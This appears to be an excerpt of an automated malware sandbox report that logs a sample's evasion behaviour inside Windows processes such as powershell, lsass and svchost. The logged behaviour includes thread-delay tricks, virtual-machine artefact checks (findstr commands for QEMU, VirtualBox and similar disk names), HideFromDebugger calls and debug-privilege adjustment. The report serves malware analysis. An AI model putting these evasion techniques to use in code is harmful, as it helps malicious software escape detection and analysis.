Source: C:\Windows\System32\dllhost.exe TID: 7012	Thread sleep count: 280 > 30
Source: C:\Windows\System32\dllhost.exe TID: 6948	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 1720	Thread sleep count: 445 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1720	Thread sleep time: -44500s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 6436	Thread sleep count: 303 > 30
Source: C:\Windows\System32\lsass.exe TID: 6436	Thread sleep time: -30300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6584	Thread sleep count: 409 > 30
Source: C:\Windows\System32\svchost.exe TID: 6584	Thread sleep time: -40900s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7308	Thread sleep count: 185 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6668	Thread sleep count: 1650 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6668	Thread sleep count: 626 > 30
Source: C:\Windows\System32\svchost.exe TID: 7348	Thread sleep count: 385 > 30
Source: C:\Windows\System32\svchost.exe TID: 7348	Thread sleep time: -38500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7304	Thread sleep count: 378 > 30
Source: C:\Windows\System32\svchost.exe TID: 7304	Thread sleep time: -37800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5000	Thread sleep count: 372 > 30
Source: C:\Windows\System32\svchost.exe TID: 5000	Thread sleep time: -37200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2844	Thread sleep count: 366 > 30
Source: C:\Windows\System32\svchost.exe TID: 2844	Thread sleep time: -36600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5160	Thread sleep count: 302 > 30
Source: C:\Windows\System32\svchost.exe TID: 5160	Thread sleep time: -30200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2448	Thread sleep count: 347 > 30
Source: C:\Windows\System32\svchost.exe TID: 2448	Thread sleep time: -34700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3176	Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 3176	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1464	Thread sleep count: 326 > 30
Source: C:\Windows\System32\svchost.exe TID: 1464	Thread sleep time: -32600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2112	Thread sleep count: 334 > 30
Source: C:\Windows\System32\svchost.exe TID: 2112	Thread sleep time: -33400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2248	Thread sleep count: 319 > 30
Source: C:\Windows\System32\svchost.exe TID: 2248	Thread sleep time: -31900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5440	Thread sleep count: 308 > 30
Source: C:\Windows\System32\svchost.exe TID: 5440	Thread sleep time: -30800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5292	Thread sleep count: 308 > 30
Source: C:\Windows\System32\svchost.exe TID: 5292	Thread sleep time: -30800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1404	Thread sleep count: 303 > 30
Source: C:\Windows\System32\svchost.exe TID: 1404	Thread sleep time: -30300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7844	Thread sleep count: 299 > 30
Source: C:\Windows\System32\svchost.exe TID: 7816	Thread sleep count: 297 > 30
Source: C:\Windows\System32\svchost.exe TID: 7852	Thread sleep count: 294 > 30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\wbem\WMIADAP.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C2D894 FindFirstFileExW,	18_2_0000022123C2D894
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	18_2_0000022123C2DA18
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C5D894 FindFirstFileExW,	18_2_0000022123C5D894
Source: C:\Windows\System32\cmd.exe	Code function: 18_2_0000022123C5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	18_2_0000022123C5DA18
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E6DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_0000013F08E6DA18
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E6D894 FindFirstFileExW,	19_2_0000013F08E6D894
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_0000013F08E9DA18
Source: C:\Windows\System32\conhost.exe	Code function: 19_2_0000013F08E9D894 FindFirstFileExW,	19_2_0000013F08E9D894
Source: C:\Windows\System32\conhost.exe	Code function: 36_2_000001FD186DD894 FindFirstFileExW,	36_2_000001FD186DD894
Source: C:\Windows\System32\conhost.exe	Code function: 36_2_000001FD186DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	36_2_000001FD186DDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DABDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_0000017C6DABDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DABD894 FindFirstFileExW,	37_2_0000017C6DABD894
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DD7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_0000017C6DD7DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000017C6DD7D894 FindFirstFileExW,	37_2_0000017C6DD7D894
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC64D894 FindFirstFileExW,	38_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_00000225DC67D894 FindFirstFileExW,	38_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0AED894 FindFirstFileExW,	39_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000202C0B1DA18
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_00000202C0B1D894 FindFirstFileExW,	39_2_00000202C0B1D894
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_000002A66130D894 FindFirstFileExW,	40_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDCD894 FindFirstFileExW,	41_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDFDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002BAAEDFDA18
Source: C:\Windows\System32\dwm.exe	Code function: 41_2_000002BAAEDFD894 FindFirstFileExW,	41_2_000002BAAEDFD894
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_2_000002705306DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002705306DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_2_000002705306D894 FindFirstFileExW,	42_2_000002705306D894

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.10.dr	Binary or memory string: VMware
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmusrvc2b
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr	Binary or memory string: VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 0000002F.00000002.3076142932.000001845BC0A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr	Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Amcache.hve.10.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.dr	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000028.00000002.2993257907.000002A66062A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.49.dr	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.10.dr	Binary or memory string: vmci.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A69FE59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: cmd.exe, 00000012.00000003.2144168789.0000022123586000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A000B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000031.00000000.2542454624.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3023041096.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: svchost.exe, 00000031.00000000.2544794675.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dowvmci
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.dr	Binary or memory string: VMware
Source: Amcache.hve.10.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual RAM
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.dr	Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: Amcache.hve.10.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxguest.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: powershell.exe, 00000007.00000002.2143782680.000001A69FE59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemuwmi2b
Source: Amcache.hve.10.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: cmd.exe, 00000012.00000003.2151836316.0000022123586000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual USB Mouse
Source: lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr	Binary or memory string: VMware, Inc.
Source: powershell.exe, 00000007.00000002.2143782680.000001A69FE3A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: QEMU HARDDISK
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxmouse.sys
Source: Amcache.hve.10.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxMouse.sys
Source: dwm.exe, 00000029.00000002.3092877606.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.49.dr	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: lsass.exe, 00000027.00000002.3013591403.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475100061.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.2481960070.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2991631959.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2995071226.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2506773435.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2994903908.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.2510442351.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2523222262.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.3015839207.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2542454624.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.10.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000031.00000002.3024245117.000001D558643000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmcitpA
Source: svchost.exe, 00000028.00000002.3000439300.000002A660662000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000038.00000000.2589284251.0000023FD3802000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.10.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: c:\program files\vmware
Source: lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxSF.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: !Hyper-V PowerShell Direct Service
Source: dwm.exe, 00000029.00000002.3092877606.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugObjectHandle

Source: C:\Windows\System32\cmd.exe

Code function: 18_2_0000022123C2CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

18_2_0000022123C2CD80

Source: C:\Windows\System32\cmd.exe

Code function: 18_2_0000022123C21E3C LoadLibraryA,GetProcAddress,Sleep,

18_2_0000022123C21E3C

Source: C:\Windows\System32\cmd.exe

Code function: 18_2_0000022123C235C8 GetProcessHeap,HeapAlloc,StrCmpNIW,GetProcessHeap,HeapFree,

18_2_0000022123C235C8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
